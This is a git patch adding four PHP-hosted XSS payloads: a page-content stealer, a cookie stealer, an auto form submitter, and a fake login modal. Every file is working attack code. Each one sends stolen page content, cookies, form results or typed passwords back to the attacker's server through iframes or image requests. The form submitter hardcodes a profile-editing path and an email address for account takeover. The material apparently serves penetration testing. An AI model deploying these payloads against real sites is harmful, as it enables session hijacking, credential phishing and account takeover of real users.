From dab2088267ade7720399da04c5e80e6e7a6287ee Mon Sep 17 00:00:00 2001
From: Strawp <github@strawp.net>
Date: Wed, 18 May 2016 14:21:52 +0100
Subject: [PATCH] Added the PHP xss payloads

---
 contentstealer.php | 33 +++++++++++++++++++
 cookiestealer.php  | 14 ++++++++
 formsubmitter.php  | 80 ++++++++++++++++++++++++++++++++++++++++++++++
 loginpage.php      | 56 ++++++++++++++++++++++++++++++++
 4 files changed, 183 insertions(+)
 create mode 100755 contentstealer.php
 create mode 100755 cookiestealer.php
 create mode 100755 formsubmitter.php
 create mode 100644 loginpage.php

diff --git a/contentstealer.php b/contentstealer.php
new file mode 100755
index 0000000..5563f50
--- /dev/null
+++ b/contentstealer.php
@@ -0,0 +1,33 @@
+<?php
+  /*
+    Host on a server under your control in order to include as a javascript and have either the current page or a page of your choosing sent back via a GET
+  */
+  header( "Content-type: text/javascript" );
+  $url = "http://".$_SERVER["SERVER_ADDR"].$_SERVER["PHP_SELF"];
+  echo "// $url\n";
+  if( !isset( $_GET["c"] ) ){
+    echo "/*\n Inject with:\n ".$url."?id=userDiv or ".$url."?tag=ul\n";
+    echo " Where:\n"
+      ."   id is the id of an element to be grabbed\n"
+      ."   tag is the name of all tags to be grabbed.\n"
+      ."   url is a URL within the same origin to download and return\n"
+      ."Defaults to tag=body\n*/\n\n";
+    if( !empty( $_GET["url"] ) ){
+      echo "function g(u){ x=new XMLHttpRequest(); x.open('GET',u,false); x.send(null); return x.responseText; }\n"
+        ."var content = g('".$_GET["url"]."');\n";
+    }elseif( !empty( $_GET["id"] ) ){
+      echo "var content = document.getElementById('".$_GET["id"]."').outerHTML;\n";
+    }else{
+      if( empty( $_GET["tag"] ) ) $_GET["tag"] = "body";
+      echo "var content = '';\n";
+      echo "var col = document.getElementsByTagName('".$_GET["tag"]."');\n";
+      echo "for( var i=0; i<col.length; i++ ){ content += col[i].outerHTML + '\\n'; }\n";
+    }
+?>
+var url = "<?php echo $url; ?>?c=" + encodeURIComponent(btoa(content));
+f = document.createElement('iframe');
+f.src = url;
+document.getElementsByTagName('body')[0].appendChild(f);
+<?php }else{
+  echo "/*\n".base64_decode( $_GET["c"] )."\n*/\n";
+}?>
diff --git a/cookiestealer.php b/cookiestealer.php
new file mode 100755
index 0000000..5e0bfdb
--- /dev/null
+++ b/cookiestealer.php
@@ -0,0 +1,14 @@
+<?php
+  // For hosting on a remote web service in order to post back cookies from a XSS vuln page
+  // Either pull the cookie data out of logs or see the decoded cookie in the response if running a packet sniffer on the host
+  $url = "http://".$_SERVER["SERVER_ADDR"].$_SERVER["PHP_SELF"];
+  echo "// $url\n";
+  if( !isset( $_GET["c"] ) ){
+?>
+var url = "<?php echo $url; ?>?c=" + encodeURIComponent(btoa(document.cookie));
+f = document.createElement('iframe');
+f.src = url;
+document.getElementsByTagName('body')[0].appendChild(f);
+<?php }else{
+  echo "/*\n".base64_decode( $_GET["c"] )."\n*/\n";
+}?>
diff --git a/formsubmitter.php b/formsubmitter.php
new file mode 100755
index 0000000..823d60d
--- /dev/null
+++ b/formsubmitter.php
@@ -0,0 +1,80 @@
+<?php
+  /*
+    Inject into a page in order to retrieve and submit a form from another page
+  */
+  header( "Content-type: text/javascript" );
+  $url = "//".$_SERVER["SERVER_ADDR"].$_SERVER["PHP_SELF"];
+  echo "// $url\n";
+  if( !isset( $_GET["c"] ) ){
+    echo "/*\n Inject with:\n ".$url."?form=0&el[email]=someone@somewhere.com&el[password]=Password123&url=createuser.php\n";
+    echo " Where:\n"
+      ."   form is the zero-based index of the form on the page you want to submit\n"
+      ."   el[] is a keyed array of form values to set on the form\n"
+      ."   url is the URL of the form you want to submit\n"
+      ."   action is an overide action URL to set the form to\n"
+      ."*/\n";
+   
+    $form = !empty( $_GET["form"] ) ? intval($_GET["form"]) : '0';
+    $els = !empty( $_GET["el"] ) ? $_GET["el"] : null;
+    $els["dnn\$ctr441\$ProfileEditor\$EmailTextBox"] = 'iwallace@nettitude.com';
+    
+    // Function to get page
+    echo "
+      function g(u){ 
+        console.log('g()');
+	x=new XMLHttpRequest(); 
+        x.open('GET',u,true); 
+        x.onload = function(e){
+         console.log('Loaded', x); 
+	  if( x.readyState === 4 && x.status === 200 ){
+            procFrm(x.responseText);
+          }
+        }; 
+        x.send(null); 
+      }\n";
+
+    // Function to handle loading of iframe
+    echo "
+      function ifload(){
+        content = document.getElementById('xss_target').contentDocument.body.innerHTML;
+        new Image().src = '".$url."?loaded&c=' + encodeURIComponent(btoa(content));
+      }
+    ";
+
+    // Function to add form to current page, add an iframe, change target to iframe, set fields, submit
+    echo "
+      function procFrm(html){
+        parser = new DOMParser();
+        doc = parser.parseFromString(html,'text/html');
+	frm = doc.getElementsByTagName('form')[$form];
+        console.log(frm);
+	frm.id = 'xss_submitform';
+	// frm.style = 'display: none;';
+	b = document.getElementsByTagName('body')[0];
+        b.appendChild( frm );
+        frm = document.getElementById('xss_submitform'); 
+        b.innerHTML += '<iframe name=\"xss_target\" id=\"xss_target\" style=\"display: none;\"></iframe>';
+        document.getElementById('xss_target').onload = ifload;
+        frm.target = 'xss_target';\n";
+	echo "frm.onsubmit = ''\n";
+     if( isset( $_GET["action"] ) ){
+        echo "        frm.action = '".$_GET["action"]."';\n";
+     }
+     if( isset( $els ) ){
+       foreach( $els as $k => $v ){
+         echo "        frm.elements.namedItem('$k').value = '$v';\n";
+         echo "        console.log(frm.elements.namedItem('$k').value);\n";
+       }
+     }
+     echo "        frm.submit();
+      }
+    ";
+    
+    // Call function to get the page, pass function to process the form
+    echo "
+      g('/Home/Settings/MyProfile/tabid/62/userid/100417/Default.aspx');\n";
+      // g('".$_GET["url"]."');\n";
+?>
+<?php }else{
+  echo "/*\n".base64_decode( $_GET["c"] )."\n*/\n";
+}?>
diff --git a/loginpage.php b/loginpage.php
new file mode 100644
index 0000000..a219b6d
--- /dev/null
+++ b/loginpage.php
@@ -0,0 +1,56 @@
+<?php
+/*
+ Call this script from an injected <script> tag to pop up a modal dialog prompting for username and password which will send back creds to the same script
+*/
+if( isset( $_GET["username"] ) ){
+	if( isset( $_SERVER['HTTP_REFERER'] ) ){
+		header( "Location: ".$_SERVER['HTTP_REFERER'] );
+	}else{
+		echo "<script>window.history.back();</script>";
+	}
+	exit;
+}
+header( "Content-type: text/javascript" );
+if( isset( $_SERVER['HTTPS'] ) && $_SERVER['HTTPS'] ){
+    $self = "https://";
+}else{
+    $self = "http://";
+}
+$self .= $_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME'];
+$html = "
+<style>
+#login_modal_fade {
+    position: absolute;
+    width: 100%;
+    height: 100%;
+    top: 0;
+    left: 0;
+    background: black;
+    opacity: 0.9;
+}
+#login_modal_container {
+    position: absolute;
+    top: 20%;
+    left: 30%;
+    width: 30%;
+    background: white;
+    padding: 0 1em;
+    border: 1px solid black;
+    border-radius: 5px;
+}
+#login_modal_container label {
+    width: 20%;
+}
+</style>
+<div id='login_modal_fade'></div>
+<div id='login_modal_container'>
+<form method='get' action='$self'>
+    <h2>Log in</h2>
+    <div class='field'><label>Username: </label><input type='text' name='username'></div>
+    <div class='field'><label>Password: </label><input type='password' name='password'></div>
+    <div class='buttons'><input type='submit' value='Log in'></div>
+</form>
+</div>";
+$html = preg_replace( "/[\n\r]/", "", $html ); 
+echo "document.body.innerHTML += \"$html\";";
+?>